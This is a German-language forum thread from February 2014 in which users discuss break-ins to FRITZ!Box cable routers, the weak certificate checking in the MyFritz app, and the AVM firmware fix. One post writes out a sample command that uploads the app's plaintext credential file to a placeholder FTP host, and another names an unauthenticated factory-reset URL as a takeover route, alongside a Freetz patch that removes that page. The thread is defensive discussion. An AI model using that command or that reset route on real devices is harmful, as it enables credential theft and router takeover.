Fritz.Box wurde gehackt

In diesem Forum geht es um die Router für Kabel Internet FRITZ!Box 6320, FRITZ!Box 6340, FRITZ!Box 6360, FRITZ!Box 6490 & FRITZ!Box 6590 Cable der Firma AVM.
tq1199
Glasfaserstrecke
Beiträge: 1816
Registriert: 07.02.2014, 09:05

Re: Fritz.Box wurde gehackt

Beitrag von tq1199 » 07.02.2014, 09:35

toomore hat geschrieben:MyFritz Account gelöscht ...
Ja, ... verstehe.
toomore hat geschrieben: ... das Telefon physikalisch von der Fritzbox abgezogen.
BTW: Der Angreifer hat nicht dein Telefon benutzt.
Kannst Du im Log deiner FritzBox sehen, von welcher externen (öffentlicher) IP-Adresse, der Angreifer sich auf deiner FritzBox angemeldet hat?

EDIT:

Wenn Du diese externe (öffentliche) IP-Adresse hast, dann erstatte Anzeige gegen denjenigen, der diese externe IP-Adresse am ... (siehe Datum und Uhrzeit im Log deiner FritzBox) verwendet hat.

EDIT 2:

Benutzt Du evtl. Fritz!Apps von AVM oder fremd, auf deinem Smartphone/Tablet für deine FritzBox?
Office Internet & Phone 50, AVM FRITZ!Box 6360 Cable (kbw) - FRITZ!OS 06.52 - , an Arris-CMTS, zusätzlich eine feste (statische, nicht per DHCP) IPv4-Adresse für meinen Server, am Bridge-Anschluss (kein Bridge-Modus, FB6360-cable wird ohne feste IPv4-Adresse als Router verwendet.)
Konfigurationsdatei der FritzBox: b2b-staticip1_50000_5000_ipv4_sip_wifi-on.bin
NTP_Provider_Interface_Spec_Unitymedia

AVM - IPv6 technical note

Benutzeravatar
SpaceRat
Glasfaserstrecke
Beiträge: 2467
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen
Kontaktdaten:

Re: Fritz.Box wurde gehackt

Beitrag von SpaceRat » 07.02.2014, 10:11

Ich schließe mich zunehmend der Haltung an, daß hier genau gar nichts gehackt wurde.

Soweit das zu überblicken ist, haben sich die Angreifer schnurstracks mit den richtigen Zugangsdaten eingeloggt und nicht geknobelt und probiert.
Die wahrscheinlichste Variante ist also, daß die Opfer ihnen die Daten auf dem Silbertablett, zumindest einem versilberten, geliefert haben.

Es könnte sich um irgendeine sensationell wichtige App handeln, die unbedingt Zugang zur Fritz!Box braucht und die Zugangsdaten dann - sicher ist sicher, so vergißt sie keiner ;) - dem App-Anbieter zuspielt. Auch möglich wäre, daß eine weitere App Daten ausliest.

Schauen wir doch mal nach:
MyFRITZ!App

Man beachte:
Bild

Also alles was man zum Glück braucht.

Und das finden wir dann auch im Klartext auf dem Smartphone wieder:
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<string name="BoxName">FRITZ!Box Fon WLAN 7390</string>
...
<string name="Password">Passwort_im_Klartext</string>
...
<string name="Adresse">labersuelzrhabarber.myfritz.net</string>
<string name="Boxname">FRITZ!Box Fon WLAN 7390</string>
<int name="Port" value="123" />
<string name="Username">Otto Opfer</string>
<boolean name="AnonymousLogin" value="true" />
<boolean name="SingleSignOn" value="true" />
</map>
Jetzt fehlt nur noch eine Version vom Quiz-Duell oder Weißdergeierwas, die nicht nur gecracked, sondern auch noch etwas "ergänzt" wurde ...
Receiver/TV:
  • Vu+ Duo² 4xS2+2xC / OpenATV 6.1@Samsung 50" Plasma
  • AX Quadbox HD2400 2xS2+2xC / OpenATV 6.1@Samsung 32" TFT
  • 2xVu+ Solo² / OpenATV 6.1
  • DVBSky S2-Twin PCIe@SyncMaster T240HD (PC)
  • TechniSat SkyStar HD2@17" (2.PC)
Pay-TV: Schwarzfunk, Redlight Elite Superchic, SCT 10, HD-, Sky
Fon: VF Komfort-Classic (ISDN), 2xFritz!Fon C4+Siedle DoorCom Analog@F!B 7390
Internet: UM 1play 100 / Cisco EPC3212+Linksys WRT1900ACS / IPv4 (UM) + IPv6 (HE)
Bild

cemetery
Kabelneuling
Beiträge: 24
Registriert: 03.01.2014, 19:39

Re: Fritz.Box wurde gehackt

Beitrag von cemetery » 07.02.2014, 10:17

Das untermauert dann genau den Verdacht den ich gestern auch schon ausgesprochen habe. :super:

Benutzeravatar
SpaceRat
Glasfaserstrecke
Beiträge: 2467
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen
Kontaktdaten:

Re: Fritz.Box wurde gehackt

Beitrag von SpaceRat » 07.02.2014, 10:24

Und das ist dann der ganze Hack:
wput /data/data/de.avm.android.myfritz/shared_prefs/de.avm.android.myfritz_preferences.xml ftp://send.me.all.your.data.cn/Project_ ... irgendeine ZufallsID>.xml

Statt wput tut's auch so ziemlich alles andere.

Einziges Problem: Hierfür braucht die App man root-Zugriff

planethas
Kabelneuling
Beiträge: 8
Registriert: 31.01.2014, 22:53

Re: Fritz.Box wurde gehackt

Beitrag von planethas » 07.02.2014, 11:03

Zu den ganzen Vermutungen hier kann ich sagen, dass ich keine Zugangsdaten zu dieser Box in einer App hinterlegt habe/hatte.

Zu den Aussagen, HTTPS sei sicher möchte ich mal ein einfach ein paar Fakten in den Raum werfen.

Natürlich ist das HTTPS Protokoll mit den gängigen Standards Sicher, sofern die Zertifikatsquelle und/oder der Herausgeber des Zertifikats vertauenswürdig ist.

Habt Ihr auf eurer Fritzbox ein Öffentliches Zertifikat installiert oder habt das Selfsign Fritzbox Zertifikat auf jedem System von dem Ihr aus auf die Box zugreift vorher persönlich von der Box auf das jenige System übertragen und im Zertifikatsspeicher des Geräts als vertrauenswürdiges Zertifikat hinterlegt?

Oder wissen hier einfach einige nicht, dass auch bei HTTPS Man-In-The-Middle möglich ist. Sofern man nicht min. den Thumbprint des Zertifikats mit dem Original vergleicht, ist ein Selfsign Zertifikat keine Hürde.

Es ist ein einfaches im Stream das Zertifikat zu tauschen und alle Daten im Klartext mitzulesen. Das größere Problem hierbei ist es, den Datenstrom überhaupt so zu leiten/abzugreifen, dass mann an die Daten kommt. Aber auch dies ist mittels ARP Spoofing in selben Netz möglich, wobei gängige Firmware auf Switches dies erkennt und blockiert.

Aber wer weiß schon, welche neue Spoofing Methode die evtl nutzen um den Datenstrom abzugreifen/umzuleiten etc.
Zuletzt geändert von planethas am 07.02.2014, 11:08, insgesamt 1-mal geändert.

Benutzeravatar
SpaceRat
Glasfaserstrecke
Beiträge: 2467
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen
Kontaktdaten:

Re: Fritz.Box wurde gehackt

Beitrag von SpaceRat » 07.02.2014, 11:07

Ohne root ist übrigens immer noch ein Mitschnitt einer Anmeldung möglich, dazu braucht man lediglich einen transparenten https-Proxy (Charles, mitmproxy).

Aufgrund der kranken (Sicherheits!-)Denke von manchen Entwicklern ist es nämlich auf Androiden so gut wie unmöglich, für solche Zugriffe mit Zertifikaten zu arbeiten:
Wer schon mal versucht hat, ein Zertifikat auf einem Androiden zu installieren, wird das in der Regel schnell wieder gelassen haben, weil er dann von Android dazu gezwungen wird, statt des einfachen "Wischens" mindestens eine Entsperrgeste einzustellen, was früher oder später nervt.
Da sich nun die Fritz!Box ihr Zertifikat aufgrund flexibler URL/IP selber erzeugen muß/müßte und das nicht einfach so eben von einer standardmäßig vorhanden Root Authority signieren lassen kann, kann die MyFritz!App gar keine brauchbare Überprüfung des Zertifikats durchführen und liefert daher die Daten auch durch einen Man-In-The-Middle-Proxy ab.

HTTPS bringt nämlich nur dann etwas, wenn die Zertifikate auch überprüft werden:
Loggt man sich einfach mal per https auf seinem NAS oder E2-Receiver o.ä. ein, dann wird man feststellen, daß man von Chrome, Firefox, IE etc. gewarnt wird, daß sich die Authentizität des Zertifikates nicht überprüfen läßt (Logisch, denn dem System ist der Aussteller nicht bekannt).

Auf dem PC läßt sich das Problem nun ganz einfach beheben:
Wenn man überprüft hat, daß die Namensauflösung auch wirklich auf den eigenen NAS etc. zeigt und das dem Browser angebotene Zertifikat in Bezug auf den Fingerprint mit dem selber erzeugten übereinstimmt, dann installiert man es einfach. Danach sieht man jederzeit am grünen oder roten bzw. durchgestrichenen "https", ob das Zertifikat nun gültig ist oder eben nicht. Selbst wenn ein Dritter ein Zertifikat für die Adresse erzeugt, unter der wir den NAS o.ä. ansprechen, wäre es auch noch lange nicht das selbe Zertifikat und somit ebenfalls ungültig.

Nun wäre es natürlich auch sinnvoll, diese Zertifikate auf dem Smartphone zu installieren, damit man gerade und insbesondere unterwegs sicher sein kann, daß man seine Anmeldedaten in das richtige (eigene) System kloppt und nicht irgendeines, das man gerade vorgesetzt bekommt (Und so ein transparenter Proxy ist eben auch ein solches, HTTPS-MITM-Angriffe sind nämlich prinzipiell zum Scheitern verurteilt, wenn der Benutzer bzw. die App auf die Korrektheit der Zertifikate achtet, ein MITM kann nämlich kein gültiges sondern bestenfalls ein ähnliches erzeugen! ...) und eben das verhindert Android und das ausgerechnet aus "Sicherheitsgründen".

Und aus diesem Grund können dann eben auch die Fritz!Apps gar keine wirkliche Überprüfung durchführen und sind somit anfällig für MITM-Angriffe ... zum Wohle der Sicherheit!

Benutzeravatar
SpaceRat
Glasfaserstrecke
Beiträge: 2467
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen
Kontaktdaten:

Re: Fritz.Box wurde gehackt

Beitrag von SpaceRat » 07.02.2014, 11:18

planethas hat geschrieben:Habt Ihr auf eurer Fritzbox ein Öffentliches Zertifikat installiert oder habt das Selfsign Fritzbox Zertifikat auf jedem System von dem Ihr aus auf die Box zugreift vorher persönlich von der Box auf das jenige System übertragen und im Zertifikatsspeicher des Geräts als vertrauenswürdiges Zertifikat hinterlegt?
Ich ja :)

Und für alle anderen Geräte habe ich auch entsprechende Zertifikate selber erzeugt ...
planethas hat geschrieben:Aber wer weiß schon, welche neue Spoofing Methode die evtl nutzen um den Datenstrom abzugreifen/umzuleiten etc.
Dafür reicht eine ... Fritz!Box ... Du schiebst einfach einen transparenten https-Proxy unter.

Da die Fritz!Apps die Zertifikate nicht prüfen (können) und wohl auch ein Großteil der Benutzer das nicht tut, ist das eine Kleinigkeit.

Ein MITM-Angriff auf https ist aber vom Grundsatz her unmöglich.
Möglich wird er erst, wenn man die Vorsichtsregeln, also das durchgestrichene "https", in der URL ignoriert oder die Zertifikate an sich Müll sind. Dann nutzt man aber im Prinzip eben auch kein https mehr, sondern nur http.

planethas
Kabelneuling
Beiträge: 8
Registriert: 31.01.2014, 22:53

Re: Fritz.Box wurde gehackt

Beitrag von planethas » 07.02.2014, 11:37

Oder wie schon des öffteren, sind evtl. wieder welche in einer CA "eingebrochen" und haben sich ein paar Zertifikate ausgestellt. Dann merkt es auch niemand.

Aber ohne Glaskugel kommen wir mit solchen Theorien nicht zum Ziel.

johnripper
Glasfaserstrecke
Beiträge: 1294
Registriert: 06.02.2014, 19:29
Wohnort: Kabelbw-Land

Re: Fritz.Box wurde gehackt

Beitrag von johnripper » 07.02.2014, 12:44

planethas hat geschrieben:Zu den ganzen Vermutungen hier kann ich sagen, dass ich keine Zugangsdaten zu dieser Box in einer App hinterlegt habe/hatte.
Danke für die Aussage.
Ich hätte auch auf irgendeine APP getippt.

Dir kann man nur raten Strafanzeige zu erstatten und die Daten von der Box soweit wie möglich zu sichern.
Ferner würde ich mich an AVM wenden.

Edit: Und checke nach der Anleitung von AMV ob IP Telefone eingerichtet sind bzw. schließe den Fernzugang.
Office & Internet 150 @ Fritz!Box 6490, OS 6.50

Benutzeravatar
koax
Kabelkopfstation
Beiträge: 3970
Registriert: 09.12.2007, 10:43
Wohnort: Köln

Re: Fritz.Box wurde gehackt

Beitrag von koax » 07.02.2014, 13:21

Arnie-75 hat geschrieben:Was stand denn im LOG bzw. unter SYSTEM, als sich der Angreifer angemeldet hat? Wenn ich mich übers Internet anmelde steht da z.B.
"Anmeldung des Benutzers MeinName an der FRITZ!Box Benutzeroberfläche von IP-Adresse xx.143.xxx.xxx"
Wer sich in die Benutzeroberfläche der Fritzbox eingelogt hat kann auch das Protokoll löschen.

johnripper
Glasfaserstrecke
Beiträge: 1294
Registriert: 06.02.2014, 19:29
Wohnort: Kabelbw-Land

Re: Fritz.Box wurde gehackt

Beitrag von johnripper » 07.02.2014, 13:22

Wir aber lt. diversen Berichten nicht gemacht. Die Hacker sind nicht daran interessiert ihre Spuren zu verwischen.
Office & Internet 150 @ Fritz!Box 6490, OS 6.50

tq1199
Glasfaserstrecke
Beiträge: 1816
Registriert: 07.02.2014, 09:05

Re: Fritz.Box wurde gehackt

Beitrag von tq1199 » 07.02.2014, 13:27

johnripper hat geschrieben:Wir aber lt. diversen Berichten nicht gemacht.
Evtl. weil man IP-Adressen auch faken kann.
Office Internet & Phone 50, AVM FRITZ!Box 6360 Cable (kbw) - FRITZ!OS 06.52 - , an Arris-CMTS, zusätzlich eine feste (statische, nicht per DHCP) IPv4-Adresse für meinen Server, am Bridge-Anschluss (kein Bridge-Modus, FB6360-cable wird ohne feste IPv4-Adresse als Router verwendet.)
Konfigurationsdatei der FritzBox: b2b-staticip1_50000_5000_ipv4_sip_wifi-on.bin
NTP_Provider_Interface_Spec_Unitymedia

AVM - IPv6 technical note

Benutzeravatar
SpaceRat
Glasfaserstrecke
Beiträge: 2467
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen
Kontaktdaten:

Re: Fritz.Box wurde gehackt

Beitrag von SpaceRat » 07.02.2014, 16:48

Für die 7390 wurde heute eine neue Firmware 6.03 veröffentlicht, deren einzige Änderung lautet:

Neue Features: - Sicherheit: Ausspähen von Benutzerdaten auf FRITZ!Box verhindert.

Was dahinter steckt, weiß ich aber nicht.

Benutzeravatar
rudy102
Kabelneuling
Beiträge: 10
Registriert: 28.01.2014, 11:32

Re: Fritz.Box wurde gehackt

Beitrag von rudy102 » 07.02.2014, 17:19

UM 2 Play 120Mbit
Fritz!Box 6490 FRITZ!OS 06.50

TelTel
Übergabepunkt
Beiträge: 326
Registriert: 07.03.2010, 16:06
Wohnort: Haan

Re: Fritz.Box wurde gehackt

Beitrag von TelTel » 07.02.2014, 17:25

Zuletzt geändert von TelTel am 07.02.2014, 18:01, insgesamt 1-mal geändert.
Bild

F-orced-customer
Glasfaserstrecke
Beiträge: 1000
Registriert: 11.09.2012, 12:54

Re: Fritz.Box wurde gehackt

Beitrag von F-orced-customer » 07.02.2014, 17:49

TelTel hat geschrieben:Ursache gefunden:

http://www.avm.de/de/Presse/Information ... 02_07.php3
Klar.

Über was redet Ihr hier eigentlich über "hacks", "hacker" und "cracks" solange die Tür zu jeder Fritz!Box noch immer für alle und alle trojaner im lan (smartphone apps!) mit dieser "Kindersicherung für Grosse" sperrangelweit offensteht:

http://fritz.box/vergessen.lua?sid=0000000000000000

Einfach anklicken und beim booten per ftp ein eigenes "recovery image" reindrücken, schon gehört einem das Ding :bäh:
Jeden Abend machen damit 1000 Rotzlöffel Ihren alten die Kindersicherung raus :D

Unbedingt raus damit und das und richtige Überwachung der Box geht NUR per open source software (freetz.org)
und eben nicht wie von AVM behauptet mit dem proprietären closed "Security by obscurity"- Nachtwächter- Zeug:

Code: Alles auswählen

[freetz-2.0]

--- patches/Config.in	(Revision 11646)
+++ patches/Config.in	(Arbeitskopie)
@@ -1050,6 +1050,12 @@
 	help
 		Hides the "unsupported changes" message from the web interface.
 
+config FREETZ_REMOVE_FACTORYRESET_LOGIN
+	bool "Remove factoryreset login"
+	default n
+	help
+		Removes unauthorized reset the box using the web interface.
+
 if FREETZ_HAS_AVM_USB_HOST
 comment "USB patches --------------------"

Index: patches/scripts/580-remove_factoryreset_login.sh
===================================================================
--- patches/scripts/580-remove_factoryreset_login.sh	(Revision 0)
+++ patches/scripts/580-remove_factoryreset_login.sh	(Revision 0)
@@ -0,0 +1,9 @@
+[ "$FREETZ_REMOVE_FACTORYRESET_LOGIN" == "y" ] || return 0
+echo1 "Removing factory-reset login"
+for files in \
+	$(find ${FILESYSTEM_MOD_DIR} -iwholename "*usr/www/*/vergessen*" -printf "%P\n") \
+	; do
+	rm_files "${FILESYSTEM_MOD_DIR}/$files"
+done
+
+

*klick* ->
Luacgi not readable filename=/vergessen.lua real_filename=/usr/www/all//vergessen.lua
Und ne schöne Intrusion Detection Meldung gibts noch kostenlos und automatisch per Mail von hier
http://fritz.box/services.lua
dazu, weil der ctlmgr daemon das als Fehlfunktion des Webinterface auffasst :super:

Code: Alles auswählen

07.02.14 xxxx	Es wurde ein Fehlerbericht versendet
Das müsste DEN schnellsten Weg versperren, aber ganz sicher sein kann man damit auch nicht, eben weil das AVM- Zeugs closed source ist, und das hat eben zur Folge, dass Schlauere, besonders hochmotivierte Gauner, die "Sicherheitslöcher" (oder gar Werks- Hintertüren) schneller finden als die User oder die Geeks der communities und das führt diese ganzen "Security by obscurity"- Sicherheitslegenden von Beamten und der closed source- Industrie seit jeher ad absurdum, besonders wenn noch sowas wie telnet eingebaut wird :zwinker:

Wenn ich Provider wäre würd ich die Cable Boxen für Freetz unterstützen und freigeben, sonst haften die eben weiter alleine für solche Einbrüche, die faule Ausrede mit zu schwachen Passwörtern ist eine kundenfeindliche reine Rechtsverdreher- Schnappsidee, man kann doch einen Kunden/client nicht für geschlamperte, veraltete oder zu billige Sicherheitssysteme eines servers einer Blackbox verantwortlich machen über den doch nur der Betreiber/Hersteller die Kontrolle hat!
Zuletzt geändert von F-orced-customer am 08.02.2014, 11:02, insgesamt 3-mal geändert.

Arnie-75
erfahrener Kabelkunde
Beiträge: 93
Registriert: 08.11.2012, 15:18

Re: Fritz.Box wurde gehackt

Beitrag von Arnie-75 » 07.02.2014, 18:09

Aha, Port 443. Und was heißt das jetzt, außer dass genau der Port für den Einbruch enutzt wurde, der halt für den Zugriff / die Fernwartung über das Internet da ist?

Benutzeravatar
blaxxz
Übergeordneter Verstärkerpunkt
Beiträge: 755
Registriert: 01.01.2013, 17:31

Re: Fritz.Box wurde gehackt

Beitrag von blaxxz » 07.02.2014, 18:14

Code: Alles auswählen

http://www.avm.de/de/Presse/Informationen/2014/2014_02_07.php3
Ich hoffe doch UM zieht sofort nach!!!
Bild

Arnie-75
erfahrener Kabelkunde
Beiträge: 93
Registriert: 08.11.2012, 15:18

Re: Fritz.Box wurde gehackt

Beitrag von Arnie-75 » 07.02.2014, 18:15

blaxxz hat geschrieben:

Code: Alles auswählen

http://www.avm.de/de/Presse/Informationen/2014/2014_02_07.php3
Ich hoffe doch UM zieht sofort nach!!!

Wie immer, dauert maximal 6 Monate ;)

F-orced-customer
Glasfaserstrecke
Beiträge: 1000
Registriert: 11.09.2012, 12:54

Re: Fritz.Box wurde gehackt

Beitrag von F-orced-customer » 07.02.2014, 18:17

Arnie-75 hat geschrieben:Aha, Port 443. Und was heißt das jetzt, außer dass genau der Port für den Einbruch enutzt wurde, der halt für den Zugriff / die Fernwartung über das Internet da ist?
Nein, dafür hat AVM keinerlei Beweise noch fachlich haltbare Szenarien vorgelegt, die c't wird immer mehr zum Klatschblatt.
Cracks erfolgen immer auf dem einfachsten verfügbaren Weg, und der ist hier über trojaner auf Windos oder Android im LAN und
http://fritz.box/vergessen.lua?sid=0000000000000000

Joerg123
Übergabepunkt
Beiträge: 484
Registriert: 29.09.2011, 18:27

Re: Fritz.Box wurde gehackt

Beitrag von Joerg123 » 07.02.2014, 19:58

siehe auch: http://www.onlinekosten.de/news/artikel ... verfuegbar

also wirds wohl bald wieder ein Update geben
da wartet UM schon immer so lange bis sie ihren Kunden endlich eine Firmware auf die Boxen spült, die bei AVM oft schon wieder out ist und dann sowas :)
wahrscheinlich werden wir in Zukunft noch 3mal länger warten müssen, bis UM sich traut eine neue AVM-Software einzuspielen
Office Internet&Phone 50/5 Mbit/s via Fritzbox 6360 mit Fritz!OS 06.52
2x DECT (Siemens S67h + S68h, HDfähig) via Fritzbox

sebr
Übergeordneter Verstärkerpunkt
Beiträge: 627
Registriert: 27.04.2011, 15:27
Wohnort: Nidda

Re: Fritz.Box wurde gehackt

Beitrag von sebr » 07.02.2014, 22:36

Überrascht hat mich die Veröffentlichung von AVM nicht wirklich. Ein so gehäuftes Auftreten in kurzer Zeit...
Aber dieser Vorfall bewegt hoffentlich gewisse Leute bei UM dazu mal die Zwangs-Ehe mit AVM und den Fritz Boxen zu überdenken. Hier kann man sich jetzt nämlich nicht mehr so einfach aus der Affäre ziehen: die Boxen sind nur gemietet, die Firmware wird durch UM "aktuell" gehalten und Manipulationen bzw. diese eigenmächtig zu verändern sind ausgeschlossen. Sofern der Kunde nicht grob fahrlässig gehandelt hat (Passwort offen rumliegen lassen etc.) muss UM für den Schaden aufkommen.
Würde man stattdessen wieder Kabelmodems samt VoIP-Logindaten verteilen die dann auf kundeneigenen Routern eingetragen werden, dann wäre man fein raus (aus der Verantwortung). Und der UM-Kunde hätte endlich wieder Wahlfreiheit beim Router da nur das Kabelmodem gestellt wird.
Bei DSL-Providern haben die Kunden jetzt sicher deutlich schlechtere Karten. AVM wird kaum Schadenersatz leisten. Die Provider ebenfalls nicht, da sie ja nicht wie UM, die Kunden nötigen eine FB zu nutzen und es somit in deren Verantwortung liegt einen geeigneten Router auszuwählen und abzusichern.
Ich bin mal gespannt wie UM reagiert. Evtl. eine gefixte FW, oder die "alte" bei der der Fernzugriff deaktiviert wurde. Vielleicht aber auch erstmal gaaaaaanz lange zeit gar nichts...
Office Internet & Phone 50
Hardware:
Fritz!Box 6490 Cable (UM) FW: FRITZ!OS 06.50

Benutzeravatar
SpaceRat
Glasfaserstrecke
Beiträge: 2467
Registriert: 08.05.2010, 01:30
Wohnort: Kreis Aachen
Kontaktdaten:

Re: Fritz.Box wurde gehackt

Beitrag von SpaceRat » 07.02.2014, 22:41

sebr hat geschrieben:Überrascht hat mich die Veröffentlichung von AVM nicht wirklich. Ein so gehäuftes Auftreten in kurzer Zeit...
Nun, sowas kann verschiedene Gründe haben.
sebr hat geschrieben:Ich bin mal gespannt wie UM reagiert. Evtl. eine gefixte FW, oder die "alte" bei der der Fernzugriff deaktiviert wurde. Vielleicht aber auch erstmal gaaaaaanz lange zeit gar nichts...
Mich interessiert jetzt vorrangig, welche Boxen überhaupt betroffen sind und ob davon überhaupt noch alle gepflegt werden.

Sollte der Bug z.B. schon in der 7270v1 existiert haben, dann hätten wir noch die ein oder andere tickende Zeitbombe im Netz.

johnripper
Glasfaserstrecke
Beiträge: 1294
Registriert: 06.02.2014, 19:29
Wohnort: Kabelbw-Land

Re: Fritz.Box wurde gehackt

Beitrag von johnripper » 07.02.2014, 22:44

sebr hat geschrieben:Sofern der Kunde nicht grob fahrlässig gehandelt hat (Passwort offen rumliegen lassen etc.) muss UM für den Schaden aufkommen.
Würde man stattdessen wieder Kabelmodems samt VoIP-Logindaten verteilen die dann auf kundeneigenen Routern eingetragen werden, dann wäre man fein raus (aus der Verantwortung). Und der UM-Kunde hätte endlich wieder Wahlfreiheit beim Router da nur das Kabelmodem gestellt wird.
Sehe ich auch so. Deswegen hat UM bei seinen Fritzbox-Kunden auch so schnell reagiert.
SpaceRat hat geschrieben:Sollte der Bug z.B. schon in der 7270v1 existiert haben, dann hätten wir noch die ein oder andere tickende Zeitbombe im Netz.
Schau mal auf den AVM FTP. Dort wurden viele aktuelle FW Versionen inkl. der Labor FW entfernt. ich gehe davon aus, dass für die auch eine neue FW kommt. Ist aber nur eine Vermutung.
Office & Internet 150 @ Fritz!Box 6490, OS 6.50

sebr
Übergeordneter Verstärkerpunkt
Beiträge: 627
Registriert: 27.04.2011, 15:27
Wohnort: Nidda

Re: Fritz.Box wurde gehackt

Beitrag von sebr » 07.02.2014, 22:47

SpaceRat hat geschrieben: Mich interessiert jetzt vorrangig, welche Boxen überhaupt betroffen sind und ob davon überhaupt noch alle gepflegt werden.

Sollte der Bug z.B. schon in der 7270v1 existiert haben, dann hätten wir noch die ein oder andere tickende Zeitbombe im Netz.
Naja, da weitere Details unbekannt sind kann es ja durchaus sein, dass diese Schwachstelle erst in der letzten Firmwareversion aufgetaucht ist aber in den vorherigen nicht - wer weiß das schon?!
Office Internet & Phone 50
Hardware:
Fritz!Box 6490 Cable (UM) FW: FRITZ!OS 06.50

Antworten

Wer ist online?

Mitglieder in diesem Forum: 0 Mitglieder und 2 Gäste